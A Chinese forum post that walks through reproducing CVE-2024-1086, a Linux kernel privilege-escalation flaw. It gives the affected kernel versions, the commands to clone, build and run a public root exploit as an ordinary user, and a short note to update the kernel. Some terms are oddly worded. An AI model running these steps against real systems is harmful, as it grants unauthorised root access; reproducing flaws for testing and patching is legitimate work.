【弊端复现】(CVE-2024-1086)Linux内核中提权弊端CVE-2024-1086 ...

打印 上一主题 下一主题

主题 532|帖子 532|积分 1596

## 影响范围
以下版本的Linux内核受该弊端影响:
- 3.15 <= Linux kernel < 6.1.76
- 5.2 <= Linux kernel < 6.6.15
- 6.7 <= Linux kernel < 6.7.3
- 6.8:rc1 = Linux kernel
该弊端不适用于内核配置 `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` 且 Linux 内核版本 > 6.4 的系统。
## 查抄是否受弊端影响
### 1. 查抄当前Linux内核版本
在终端运行以下下令,查看当前内核版本:
uname -a
该弊端影响了使用Linux内核版本v5.14 - v6.6 版本(不包括分支修补版本 v5.15.149、v6.1.76和v6.6.15)的大多数 Linux系统/内核,包括CentOS、Debian、Ubuntu和 KernelCTF等
根本上2023前或者2023的都存在
弊端使用

切换成普通用户一步步来就可以
su 用户名字
  1. #拉取项目并编译
  2. git clone https://github.com/Notselwyn/CVE-2024-1086
  3. cd CVE-2024-1086
  4. make
  5. #然后运行
  6. ./exploit
复制代码
make不肯定要全部成功只要生成exploit就可以

我这里下载好了

直接执行就可以了
./exploit
可以看到执行id下令后

弊端修复

更新Linux内核

根据差别的Linux发行版,接纳相应的内核更新步骤。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

干翻全岛蛙蛙

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表